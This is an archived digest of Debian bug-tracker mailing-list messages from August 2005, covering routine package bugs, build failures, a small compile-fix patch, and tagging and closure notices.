To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: c2faxsend kernel oops problem

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 325704 linux-2.6 2.6.12-2
Bug#325704: Kernel oops with c2faxsend
Bug reassigned from package `capi4hylafax' to `linux-2.6'.

 submitter 325704 Carsten Menke [EMAIL PROTECTED]
Bug#325704: Kernel oops with c2faxsend
Changed Bug submitter from Hanno 'Rince' Wagner [EMAIL PROTECTED] to Carsten 
Menke [EMAIL PROTECTED].

 owner 325704 [EMAIL PROTECTED]
Bug#325704: Kernel oops with c2faxsend
Owner recorded as [EMAIL PROTECTED]

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#322869: fprobe: allocates all available memory

2005-08-30 Thread Steve Langasek
Hi Radu,

 Also i would suggest you use fprobe-ng. The last version of fprobe was
 released in March of 2003, and from then upstream seemed reluctant to
 fix whatever bugs i found.

In that case, could fprobe be turned into a dummy package that depends
on fprobe-ng, or are there incompatibilties that make an automatic
upgrade inappropriate?

Thanks,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


Processed: please don't use suite tags this way

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 319713 - etch, sarge
Bug#319713: Broken build, needs gtk+  2.6 AND libglade  2.5
Tags were: etch sarge fixed-upstream
Tags removed: etch, sarge

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#324580: trickle: [PATCH] fix FTBFS from a local #define conflicting with a system typedef

2005-08-30 Thread Robert Lemmen
On Tue, Aug 30, 2005 at 01:14:21AM -0700, Eric Wong wrote:
 I've modified the upstream source directly to minimize the diff.  The
 other approach would be to hack modify the configure.in autotools file
 and generate a humongous diff.gz, which I'd rather avoid.
 [...]

i have done something similar, and i talked to upstream. the new package
is currently waiting for ma sponsor to upload it...

cu  robert

-- 
Robert Lemmen   http://www.semistable.com 


signature.asc
Description: Digital signature


Bug#322869: fprobe: allocates all available memory

2005-08-30 Thread Radu Spineanu
Steve Langasek wrote:
 
 In that case, could fprobe be turned into a dummy package that depends
 on fprobe-ng, or are there incompatibilties that make an automatic
 upgrade inappropriate?
 

I don't see it being a problem.

The old fprobe didn't have an init script or configuration file when i
adopted it. fprobe-ng configures itself on installation and creates a
file in /etc/default.

On an upgrade fprobe would be uninstalled and the user prompted with the
initial questions for fprobe-ng.

There is a theoretical vuln in fprobe-ng that was reported by Florian
Weimer[1]. I sent an email to upstream about this, he said it's highly
unlikely it could be used in DoS.

Hmm. I've fixed this issue in 1.1. Each time fprobe start it use random
CRC16 polynomial and random special 'shuffle' table, thus DoS attack is
something purely hypothetical: intruder must know all random parameters
(total 258 bytes- ~1077 variants) to success the DoS.

However i asked him if he is still willing to fix this anyway by using
Florian Weimer's suggestions. I am waiting for his reply.

Thanks,
Radu

[1] #322699


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325701: gnome-session: unable to launch gnome due to bad group/owner on .ICEauthority

2005-08-30 Thread Olivier Schwander
Package: gnome-session
Version: 2.10.0-6
Severity: grave
Justification: renders package unusable

Hello,
gdm fails to launch gnome.
The logfile .xsession-errors follows:
/etc/gdm/PreSession/Default: Registering your session with wtmp and utmp
/etc/gdm/PreSession/Default: running: /usr/bin/X11/sessreg -a -w
/var/log/wtmp -u /var/run/utmp -x /var/lib/gdm/:0.Xservers -h
 -l
:0 olivier
/etc/gdm/PreSession/Default: Registering your session with wtmp and utmp
/etc/gdm/PreSession/Default: running: /usr/bin/X11/sessreg -a -w
/var/log/wtmp -u /var/run/utmp -x /var/lib/gdm/:0.Xservers -h
 -l
:0 olivier
 /etc/gdm/Xsession: Beginning session setup...
 
  ** (gnome-session:7151): WARNING **: Unable to read ICE authority
file: /home/olivier/.ICEauthority

A solution is to change owner/group of the file .ICEauthority from root:root
to username:username.

I think it is a problem in the preinst script.
Thanks

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/dash
Kernel: Linux 2.6.12-1-k7
Locale: LANG=fr_FR, LC_CTYPE=fr_FR (charmap=ISO-8859-15) (ignored: LC_ALL set 
to [EMAIL PROTECTED])

Versions of packages gnome-session depends on:
ii  desktop-base  0.3.15 common files for the Debian Deskto
ii  gconf22.10.1-1   GNOME configuration database syste
ii  gnome-control-center  1:2.10.1-6 utilities to configure the GNOME d
ii  libatk1.0-0   1.10.1-2   The ATK accessibility toolkit
ii  libbonobo2-0  2.10.0-1   Bonobo CORBA interfaces library
ii  libc6 2.3.5-5GNU C Library: Shared libraries an
ii  libesd0   0.2.36-1   Enlightened Sound Daemon - Shared 
ii  libgconf2-4   2.10.1-1   GNOME configuration database syste
ii  libglib2.0-0  2.8.0-1The GLib library of C routines
ii  libgnome2-0   2.10.1-1   The GNOME 2 library - runtime file
ii  libgnomeui-0  2.10.1-1   The GNOME 2 libraries (User Interf
ii  libgtk2.0-0   2.6.9-1The GTK+ graphical user interface 
ii  libice6   6.8.2.dfsg.1-5 Inter-Client Exchange library
ii  liborbit2 1:2.12.2-3 libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-0 1.8.2-1Layout and rendering of internatio
ii  libsm66.8.2.dfsg.1-5 X Window System Session Management
ii  libx11-6  6.8.2.dfsg.1-5 X Window System protocol client li
ii  libxmu6   6.8.2.dfsg.1-5 X Window System miscellaneous util
ii  libxrandr26.8.2.dfsg.1-5 X Window System Resize, Rotate and
ii  libxt66.8.2.dfsg.1-5 X Toolkit Intrinsics
ii  xlibs 6.8.2.dfsg.1-5 X Window System client libraries m

Versions of packages gnome-session recommends:
ii  dbus-1-utils 0.23.4-6simple interprocess messaging syst
ii  gnome-panel  2.10.2-1launcher and docking facility for 
ii  metacity 1:2.10.3-2  A lightweight GTK2 based Window Ma
ii  nautilus 2.10.1-4file manager and graphical shell f
ii  sawfish  1:1.3+cvs20050709-4 a window manager for X11

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325562: Processed: your mail

2005-08-30 Thread Steve Langasek
Andreas,

On Tue, Aug 30, 2005 at 01:33:28AM -0700, Debian Bug Tracking System wrote:
 Processing commands for [EMAIL PROTECTED]:

  tags 325562 help
 Bug#325562: zope-textindexng2_1:2.2.0-1(m68k/unstable/vault13): FTBFS on m68k
 Tags were: sid
 Tags added: help

What kind of help are you looking for?  Is there no straightforward way
to override optimization flags for this package?  It seems that if
nothing else, setup.py should allow you to set ext_args = ['-O2'], which 
is the policy-recommended optimization level for all architectures
anyway.

Cheers,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


Processed: your mail

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 324797 +experimental
Bug#324797: boa-constructor: wx-2.6-gtk2 ImportError with experimental 4.x 
package
There were no tags set.
Tags added: experimental

 tags 324797 +pending
Bug#324797: boa-constructor: wx-2.6-gtk2 ImportError with experimental 4.x 
package
Tags were: experimental
Tags added: pending

 quit
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325700: mozilla-firefox: The images are no longer displayed

2005-08-30 Thread Vincent Lefevre
Package: mozilla-firefox
Version: 1.0.6-3
Severity: grave
Justification: renders package unusable

The images (both in the interface, such as the toolbar buttons, and
in the HTML documents[*]) are no longer displayed.

[*] Alternative text is displayed instead.

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (900, 'testing'), (900, 'stable'), (200, 'unstable')
Architecture: powerpc (ppc)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-20050829
Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1)

Versions of packages mozilla-firefox depends on:
ii  debianutils2.14.1Miscellaneous utilities specific t
ii  fontconfig 2.3.2-1   generic font configuration library
ii  libatk1.0-01.10.1-2  The ATK accessibility toolkit
ii  libc6  2.3.5-5   GNU C Library: Shared libraries an
ii  libfontconfig1 2.3.2-1   generic font configuration library
ii  libfreetype6   2.1.7-2.4 FreeType 2 font engine, shared lib
ii  libgcc11:4.0.1-2 GCC support library
ii  libglib2.0-0   2.8.0-1   The GLib library of C routines
ii  libgtk2.0-02.6.8-1   The GTK+ graphical user interface 
ii  libidl00.8.5-1   library for parsing CORBA IDL file
ii  libjpeg62  6b-10 The Independent JPEG Group's JPEG 
ii  libkrb53   1.3.6-4   MIT Kerberos runtime libraries
ii  libpango1.0-0  1.8.2-1   Layout and rendering of internatio
ii  libpng12-0 1.2.8rel-1PNG library - runtime
ii  libstdc++6 4.0.1-2   The GNU Standard C++ Library v3
ii  libx11-6   4.3.0.dfsg.1-14   X Window System protocol client li
ii  libxext6   4.3.0.dfsg.1-14   X Window System miscellaneous exte
ii  libxft22.1.7-1   FreeType-based font drawing librar
ii  libxinerama1   6.8.2.dfsg.1-5X Window System multi-head display
ii  libxp6 4.3.0.dfsg.1-14   X Window System printing extension
ii  libxt6 4.3.0.dfsg.1-14   X Toolkit Intrinsics
ii  psmisc 21.6-1Utilities that use the proc filesy
ii  xlibs  4.3.0.dfsg.1-14   X Keyboard Extension (XKB) configu
ii  zlib1g 1:1.2.2-4.sarge.2 compression library - runtime

mozilla-firefox recommends no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325643: moc: uninstallable in sid (depends on libflac6 which is UNAVAILABLE)

2005-08-30 Thread Elimar Riesebieter
Hi Miernik,

On Tue, 30 Aug 2005 the mental interface of
Miernik told:

[...]
 moc in version 2.3.1-1 which is in sid depends on libflac6
 which is UNAVAILABLE, making moc uninstallable.
 
 libflac6 has been superseded by libflac7 which is in sid.

Yes, we have to rebuild moc at all. It won't be uploaded at the
moment, because we want streaming with moc. Streaming needs
libcurl. libcurl ldd's libssl. Since moc is GPL'd we can't build it
against any libssl dependency :( Please see #318590 and
http://www.gnome.org/~markmc/openssl-and-the-gpl.html.

Hopefully libcurl solves these issues upstream soon. An alternative
and a solid fix would be to build curl against gnutls only!

If we provide moc build against libcurl3-dev-gnutls there would be
many packages deinstalled because libcurl3-gnutls conflicts to
libcurl3.

Elimar

-- 
  Talking much about oneself can also 
   be a means to conceal oneself.
 -Friedrich Nietzsche


pgp3aXymCQBP9.pgp
Description: PGP signature


Bug#325605: dhcp3-server core dumps when receiving a request on sparc64

2005-08-30 Thread Andrew Pollock
tags 325605 + moreinfo
thanks

On Mon, Aug 29, 2005 at 08:27:40PM +0200, Sebastien Bernard wrote:
 Package: dhcp3-server
 Version: 3.0.2-3
 Severity: grave
 Justification: renders package unusable
 
 dhcp3-server do a sigsegv each time a client send a request for a lease.
 Recompiling the package with gcc-3.3 fix the problem.
 core dumps seems to be a miscompilation from gcc-4.0.1.
 

Hello,

A similiar issue in dhcp3-client disappeared in version 3.0.3-2, which is
now available in unstable.

Would you mind testing the same version of the server and let me know if the
problem persists?

regards

Andrew


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#325605: dhcp3-server core dumps when receiving a request on sparc64

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 325605 + moreinfo
Bug#325605: dhcp3-server core dumps when receiving a request on sparc64
There were no tags set.
Tags added: moreinfo

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#298421: marked as done (sphinx2: FTBFS (amd64/gcc-4.0): invalid storage class for function 'block_actual_cdcn_norm')

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 04:17:09 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#298421: fixed in sphinx2 0.5-3
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 7 Mar 2005 13:11:58 +
From [EMAIL PROTECTED] Mon Mar 07 05:11:58 2005
Return-path: [EMAIL PROTECTED]
Received: from c223012.adsl.hansenet.de (localhost.localdomain) [213.39.223.12] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1D8I1e-00043k-00; Mon, 07 Mar 2005 05:11:58 -0800
Received: from aj by localhost.localdomain with local (Exim 4.44)
id 1D8Ixy-0001kR-FR; Mon, 07 Mar 2005 15:12:14 +0100
To: Debian Bug Tracking System [EMAIL PROTECTED]
From: Andreas Jochens [EMAIL PROTECTED]
Subject: sphinx2: FTBFS (amd64/gcc-4.0): invalid storage class for function 
'block_actual_cdcn_norm'
Message-Id: [EMAIL PROTECTED]
Date: Mon, 07 Mar 2005 15:12:14 +0100
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: sphinx2
Severity: normal
Tags: patch

When building 'sphinx2' on amd64 with gcc-4.0,
I get the following error:

fi
 gcc -DHAVE_CONFIG_H -I. -I. -I../.. -I../../src/libsphinx2/include 
-I../../include -I../../include -DFAST8B=1 -g -O2 -Wall -DAD_BACKEND_OSS -MT 
blk_cdcn_norm.lo -MD -MP -MF .deps/blk_cdcn_norm.Tpo -c blk_cdcn_norm.c  -fPIC 
-DPIC -o .libs/blk_cdcn_norm.o
blk_cdcn_norm.c: In function 'block_cdcn_norm':
blk_cdcn_norm.c:49: error: invalid storage class for function 
'block_actual_cdcn_norm'
blk_cdcn_norm.c:78: warning: implicit declaration of function 
'block_actual_cdcn_norm'
blk_cdcn_norm.c: At top level:
blk_cdcn_norm.c:102: warning: conflicting types for 'block_actual_cdcn_norm'
blk_cdcn_norm.c:102: error: static declaration of 'block_actual_cdcn_norm' 
follows non-static declaration
blk_cdcn_norm.c:78: error: previous implicit declaration of 
'block_actual_cdcn_norm' was here
make[5]: *** [blk_cdcn_norm.lo] Error 1
make[5]: Leaving directory `/sphinx2-0.5/src/libsphinx2'

With the attached patch 'sphinx2' can be compiled
on amd64 using gcc-4.0.

Regards
Andreas Jochens

diff -urN ../tmp-orig/sphinx2-0.5/src/libsphinx2/blk_cdcn_norm.c 
./src/libsphinx2/blk_cdcn_norm.c
--- ../tmp-orig/sphinx2-0.5/src/libsphinx2/blk_cdcn_norm.c  2004-07-16 
02:57:11.0 +0200
+++ ./src/libsphinx2/blk_cdcn_norm.c2005-03-07 14:52:40.954556643 +0100
@@ -36,6 +36,8 @@
 #include math.h
 #include cdcn.h
 
+static void block_actual_cdcn_norm();
+
 /
  *   Dummy routine to convert from suitcase to sane varibles
  ***/
@@ -46,7 +48,6 @@
 {
 /* Multidimensional arrays in C suck, so we have to
forward-declare-hack this. */
-static void block_actual_cdcn_norm();
 float *variance, *prob, *tilt, *noise, *codebook, *corrbook;
 intnum_codes;
 
diff -urN ../tmp-orig/sphinx2-0.5/src/libsphinx2/cdcn_norm.c 
./src/libsphinx2/cdcn_norm.c
--- ../tmp-orig/sphinx2-0.5/src/libsphinx2/cdcn_norm.c  2004-07-16 
02:57:11.0 +0200
+++ ./src/libsphinx2/cdcn_norm.c2005-03-07 14:53:38.791393067 +0100
@@ -36,6 +36,8 @@
 #include math.h
 #include cdcn.h
 
+static void actual_cdcn_norm();
+
 /
  *   Dummy routine to convert from suitcase to sane varibles
  ***/
@@ -44,7 +46,6 @@
CDCN_type *cdcn_variables)
 {
 /* Multidimensional arrays, yuck. */
-static void actual_cdcn_norm();
 float *variance, *prob, *tilt, *noise, *codebook, *corrbook;
 int num_codes;
 
diff -urN ../tmp-orig/sphinx2-0.5/src/libsphinx2/cdcn_update.c 
./src/libsphinx2/cdcn_update.c
--- ../tmp-orig/sphinx2-0.5/src/libsphinx2/cdcn_update.c2005-03-07 
15:04:19.924642521 +0100
+++ ./src/libsphinx2/cdcn_update.c  2005-03-07 14:55:24.187049760 +0100
@@ -37,6 +37,12 @@
 #include math.h
 #include cdcn.h
 
+static float initialize (float [][NUM_COEFF+1], int, float *, float [],
+ float, float [][NUM_COEFF+1], float *, float [][NUM_COEFF+1], int);
+static void correction(float *, float *, float *, 

Processed: Re: aspell-es: at install time : Could not build the hash file for es

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tag 323605 moreinfo
Bug#323605: aspell-es: at install time : Could not build the hash file for es
There were no tags set.
Tags added: moreinfo

 severity 323605 important
Bug#323605: aspell-es: at install time : Could not build the hash file for es
Severity set to `important'.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#323347: Another XMLRPC issue in drupal

2005-08-30 Thread Moritz Muehlenhoff
Moritz Muehlenhoff wrote:
 Package: drupal
 Severity: grave
 Tags: security
 Justification: user security hole
 
 [I'm pretty sure you are already aware of it; but here it is anyway]
 
 Another XMLRPC vulnerability has been detected that affects Drupal
 as well. Please see http://www.hardened-php.net/advisory_142005.66.html
 for information about the issue in general. 
 
 The new upstream release 4.5.4 resolves this issue.

drupal's transition into testing doesn't take place, because the changelog
of the fixed package didn't contain bug closers and the two RC security bugs
prevent migration.
So, please, either close them manually or with the next upload.

Cheers,
Moritz


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325283: marked as done (yabasic: FTBFS: Missing build dependencies.)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 04:32:08 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#325283: fixed in yabasic 2.761-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 27 Aug 2005 10:05:27 +
From [EMAIL PROTECTED] Sat Aug 27 03:05:26 2005
Return-path: [EMAIL PROTECTED]
Received: from apate.telenet-ops.be [195.130.132.57] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E8xZ0-0003uk-00; Sat, 27 Aug 2005 03:05:26 -0700
Received: from localhost (localhost.localdomain [127.0.0.1])
by apate.telenet-ops.be (Postfix) with SMTP id 2588438068
for [EMAIL PROTECTED]; Sat, 27 Aug 2005 12:05:25 +0200 (CEST)
Received: from Q.roeckx.be (dD5775F4A.access.telenet.be [213.119.95.74])
by apate.telenet-ops.be (Postfix) with ESMTP id 1572E380C5
for [EMAIL PROTECTED]; Sat, 27 Aug 2005 12:05:25 +0200 (CEST)
Received: by Q.roeckx.be (Postfix, from userid 501)
id B156626136; Sat, 27 Aug 2005 12:05:24 +0200 (CEST)
Date: Sat, 27 Aug 2005 12:05:24 +0200
From: Kurt Roeckx [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: yabasic: FTBFS: Missing build dependencies.
Message-ID: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: yabasic
Version: 2.761-1
Severity: serious

Hi,

Your package is failing to build because it is missing a build
dependency on atleast libxt-dev:
if gcc -DHAVE_CONFIG_H -I. -I. -I. -DUNIX-Wall -g -O2 -MT main.o -MD -MP 
-MF.deps/main.Tpo -c -o main.o main.c; \
then mv -f .deps/main.Tpo .deps/main.Po; else rm -f .deps/main.Tpo; exit 
1; fi
In file included from main.c:20:
yabasic.h:85:27: error: X11/Intrinsic.h: No such file or directory



Kurt


---
Received: (at 325283-close) by bugs.debian.org; 30 Aug 2005 11:38:21 +
From [EMAIL PROTECTED] Tue Aug 30 04:38:21 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA4LY-0003K5-00; Tue, 30 Aug 2005 04:32:08 -0700
From: Matej Vela [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#325283: fixed in yabasic 2.761-2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 04:32:08 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: yabasic
Source-Version: 2.761-2

We believe that the bug you reported is fixed in the latest version of
yabasic, which is due to be installed in the Debian FTP archive:

yabasic_2.761-2.diff.gz
  to pool/main/y/yabasic/yabasic_2.761-2.diff.gz
yabasic_2.761-2.dsc
  to pool/main/y/yabasic/yabasic_2.761-2.dsc
yabasic_2.761-2_i386.deb
  to pool/main/y/yabasic/yabasic_2.761-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Matej Vela [EMAIL PROTECTED] (supplier of updated yabasic package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 30 Aug 2005 13:13:50 +0200
Source: yabasic
Binary: yabasic
Architecture: source i386
Version: 2.761-2
Distribution: unstable
Urgency: low
Maintainer: Matej Vela [EMAIL PROTECTED]
Changed-By: Matej Vela [EMAIL PROTECTED]
Description: 
 yabasic- Yet Another BASIC interpreter
Closes: 325283
Changes: 
 yabasic (2.761-2) unstable; urgency=low
 .
   * Add build dependency on libxt-dev.  Closes: #325283.
Files: 
 b775c55cd936b24514c6684f2feb4bc3 631 interpreters optional yabasic_2.761-2.dsc
 

Bug#325701: gnome-session: unable to launch gnome due to bad group/owner on .ICEauthority

2005-08-30 Thread Gustavo Noronha Silva
Em Ter, 2005-08-30 às 11:38 +0200, Olivier Schwander escreveu:
   ** (gnome-session:7151): WARNING **: Unable to read ICE authority
 file: /home/olivier/.ICEauthority
 
 A solution is to change owner/group of the file .ICEauthority from root:root
 to username:username.
 
 I think it is a problem in the preinst script.

preinst scripts are not supposed to mess up with your home directory;
how did that .ICEauthority arrive at your home directory in the first
place?

I bet it is not a problem in gnome-session, but some other thing that
messed up by writing that file there. Any ideas?

See ya,

-- 
[EMAIL PROTECTED]: Gustavo Noronha http://people.debian.org/~kov
Debian:  http://www.debian.org  *  http://www.debian-br.org



signature.asc
Description: This is a digitally signed message part


Bug#325562: Processed: your mail

2005-08-30 Thread Andreas Tille

On Tue, 30 Aug 2005, Steve Langasek wrote:


to override optimization flags for this package?  It seems that if
nothing else, setup.py should allow you to set ext_args = ['-O2'], which
is the policy-recommended optimization level for all architectures
anyway.


I tried to follow your hint:

$ grep -R -- -O[23] *
debian/changelog:  * setup.py: ext_args = ['-O2']
setup.py:ext_args = ['-Wall', '-O2']

(just added the option) which leaded to

gcc -pthread -fno-strict-aliasing -DNDEBUG -g -O3 -Wall -Wstrict-prototypes 
-fPIC -I/usr
/include/python2.3 -c src/python-Levenshtein-0.10/Levenshtein.c -o 
build/temp.linux-i686-2
.3/src/python-Levenshtein-0.10/Levenshtein.o -Wall -O2

I guess that these options I do not control are included by distutils.setup and
the optopns I added are just appended.  So I'm a little bit unsure which option
wins this game.


Well, there are a number of gcc bugs on m68k that are known to occur
only when using -O3; I don't know if this is one of them, but there is a
good chance that it is.  Unless you want to ask [EMAIL PROTECTED] to test
for you first, I think uploading is an ok solution.


Perhaps I'll have to do that if you can not assure me that the build above
would work.

Thanks for your help

  Andreas.

--
http://fam-tille.de


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325567: gem: FTBFS (amd64): 'quicktime_supported_video' was not declared in this scope

2005-08-30 Thread IOhannes m zmoelnig

Guenter Geiger wrote:


Hi,

Thanks for the patch. I am fighting with a changed API for ffmpeg on
unstable though. Did you compile on testing ?



for quicktime, neither quicktime/quicktime.h nor lqt/quicktime.h 
should be included but plain quicktime.h (and the full include-path 
returned by lqt-config (or pkg-config libquicktime (only available on 
unstable i think) should be added to the INCLUDES)


as for PIC: is still have no real idea how to handle this upstream; 
currently i use/suggest something like

PKG_FFMPEG_LIBS=`ffmpeg-config --plugin-libs avformat ./configure

but i am not sure, whether this hack is suitable for a distribution.

as for the ffmpeg-api changes, in upstream filmFFMPEG there are some 
adaptions to this.



just my 2cents.


mfg.asd.r
IOhannes


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325701: gnome-session: unable to launch gnome due to bad group/owner on .ICEauthority

2005-08-30 Thread Josselin Mouette
Le mardi 30 août 2005 à 08:54 -0300, Gustavo Noronha Silva a écrit :
 Em Ter, 2005-08-30 às 11:38 +0200, Olivier Schwander escreveu:
** (gnome-session:7151): WARNING **: Unable to read ICE authority
  file: /home/olivier/.ICEauthority
  
  A solution is to change owner/group of the file .ICEauthority from root:root
  to username:username.
  
  I think it is a problem in the preinst script.
 
 preinst scripts are not supposed to mess up with your home directory;
 how did that .ICEauthority arrive at your home directory in the first
 place?
 
 I bet it is not a problem in gnome-session, but some other thing that
 messed up by writing that file there. Any ideas?

It could be some GNOME program run as root with HOME=/home/olivier.
-- 
 .''`.   Josselin Mouette/\./\
: :' :   [EMAIL PROTECTED]
`. `'[EMAIL PROTECTED]
   `-  Debian GNU/Linux -- The power of freedom



Bug#325714: python2.3-ipython: Segfault when entering any command.

2005-08-30 Thread Peter Gebauer
Package: python2.3-ipython
Version: 0.6.15-1
Severity: grave
Justification: renders package unusable

Typing any command and pressing enter results in a segfault.
Please tell me if you need any additional information.

Here's the ldd for my Python 2.3 binary:
libpthread.so.0 = /lib/libpthread.so.0 (0x40023000)
libdl.so.2 = /lib/libdl.so.2 (0x40074000)
libutil.so.1 = /lib/libutil.so.1 (0x40077000)
libm.so.6 = /lib/libm.so.6 (0x4007b000)
libc.so.6 = /lib/libc.so.6 (0x4009d000)
/lib/ld-linux.so.2 = /lib/ld-linux.so.2 (0x4000)

And here's a strace of starting ipython, entering one command and then 
segfault (from the output of the prompt until the segfault):
27649 write(1, \33[0;32mIn [\33[1;32m1\33[0;32m]: \33[0m, 33) = 33
27649 rt_sigprocmask(SIG_BLOCK, NULL, [RTMIN], 8) = 0
27649 read(0, ?, 1)   = 1
27649 write(1, ?, 1)  = 1
27649 rt_sigprocmask(SIG_BLOCK, NULL, [RTMIN], 8) = 0
27649 read(0, \r, 1)  = 1
27649 write(1, \n, 1) = 1
27649 rt_sigprocmask(SIG_BLOCK, [INT], [RTMIN], 8) = 0
27649 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig -icanon 
-echo ...}) = 0
27649 ioctl(0, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig icanon 
echo ...}) = 0
27649 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon 
echo ...}) = 0
27649 rt_sigprocmask(SIG_SETMASK, [RTMIN], NULL, 8) = 0
27649 rt_sigaction(SIGINT, {0x4002e7a0, [], SA_RESTORER, 0x400c66f8}, 
{0x4002e7a0, [], SA_RESTORER, 0x400c66f8}, 8) = 0
